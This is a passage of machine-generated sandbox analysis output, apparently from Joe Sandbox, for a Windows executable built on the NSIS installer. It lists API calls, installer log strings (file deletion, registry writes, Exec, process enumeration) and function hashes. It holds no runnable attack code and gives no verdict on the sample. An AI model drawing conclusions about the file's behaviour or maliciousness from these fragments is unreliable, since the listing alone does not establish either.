                                                                                        • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                        • FindClose.KERNEL32(?), ref: 00406E33
                                                                                        Strings
                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                        • \*.*, xrefs: 00406D03
                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                        • API String ID: 2035342205-3294556389
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 3581403547-784952888
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                        Strings
                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CreateInstance
                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                        • API String ID: 542301482-1377821865
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                        • API String ID: 20674999-2124804629
                                                                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
• ShowWindow.USER32(?), ref: 004054D2
• DestroyWindow.USER32 ref: 004054E6
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
• GetDlgItem.USER32(?,?), ref: 00405523
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
• IsWindowEnabled.USER32(00000000), ref: 0040553E
• GetDlgItem.USER32(?,00000001), ref: 004055ED
• GetDlgItem.USER32(?,00000002), ref: 004055F7
• SetClassLongW.USER32(?,000000F2,?), ref: 00405611
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
• GetDlgItem.USER32(?,00000003), ref: 00405708
• ShowWindow.USER32(00000000,?), ref: 0040572A
• EnableWindow.USER32(?,?), ref: 0040573C
• EnableWindow.USER32(?,?), ref: 00405757
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
• EnableMenuItem.USER32(00000000), ref: 00405774
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
• lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
• SetWindowTextW.USER32(?,00447240), ref: 004057DC
• ShowWindow.USER32(?,0000000A), ref: 00405910
Strings
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID: @rD
• API String ID: 184305955-3814967855
• Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
• Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
• Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
• Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
• GetDlgItem.USER32(?,000003E8), ref: 00404181
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
• GetSysColor.USER32(?), ref: 004041AF
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
• lstrlenW.KERNEL32(?), ref: 004041D6
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
  • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
• GetDlgItem.USER32(?,0000040A), ref: 0040424A
• SendMessageW.USER32(00000000), ref: 00404251
• GetDlgItem.USER32(?,000003E8), ref: 0040427E
• SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
• LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
• SetCursor.USER32(00000000), ref: 004042D2
• ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
• LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
• SetCursor.USER32(00000000), ref: 004042F6
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
Strings
Similarity
• API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
• String ID: @%F$N$open
• API String ID: 3928313111-3849437375
• Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
• Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
• Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
• Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
APIs
• lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
• CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
• GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
• GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
• WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
• WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
• wsprintfA.USER32 ref: 00406B4D
• GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
• WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
• GlobalFree.KERNEL32(00000000), ref: 00406C52
• CloseHandle.KERNEL32(?), ref: 00406C5C
Strings
Similarity
• API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
• String ID: F$%s=%s$NUL$[Rename]
• API String ID: 565278875-1653569448
• Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
• Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
• Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
• Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010D8
• FillRect.USER32(00000000,?,00000000), ref: 004010ED
• DeleteObject.GDI32(?), ref: 004010F6
• CreateFontIndirectW.GDI32(?), ref: 0040110E
• SetBkMode.GDI32(00000000,00000001), ref: 0040112F
• SetTextColor.GDI32(00000000,000000FF), ref: 00401139
• SelectObject.GDI32(00000000,?), ref: 00401149
• DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
• SelectObject.GDI32(00000000,00000000), ref: 00401169
• DeleteObject.GDI32(?), ref: 0040116E
• EndPaint.USER32(?,?), ref: 00401177
Strings
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
• Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
• Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
• Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
APIs
• RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
• lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
• RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
• RegCloseKey.ADVAPI32(?), ref: 004029E4
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Strings
• WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
• WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
• WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
• WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
• WriteReg: error creating key "%s\%s", xrefs: 004029F5
• WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
Similarity
• API ID: lstrlen$CloseCreateValuewvsprintf
• String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
• API String ID: 1641139501-220328614
• Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
• Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
• Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
• Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                        Strings
                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                        • API String ID: 3294113728-3145124454
                                                                                        • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                        • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                        Similarity
                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                        • API String ID: 3734993849-2769509956
                                                                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                        • GetSysColor.USER32(?), ref: 00403E2B
                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                        • DeleteObject.GDI32(?), ref: 00403E55
                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
                                                                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                        Strings
                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                        • API String ID: 1033533793-945480824
                                                                                        • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                        • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                        • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2740478559-0
                                                                                        • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                        • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                        • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                        • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                        APIs
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                        Strings
                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                        • API String ID: 2014279497-3433828417
                                                                                        • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                        • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                        • GetMessagePos.USER32 ref: 00404871
                                                                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                        • MulDiv.KERNEL32(0001B800,00000064,?), ref: 00403295
                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                        Strings
                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
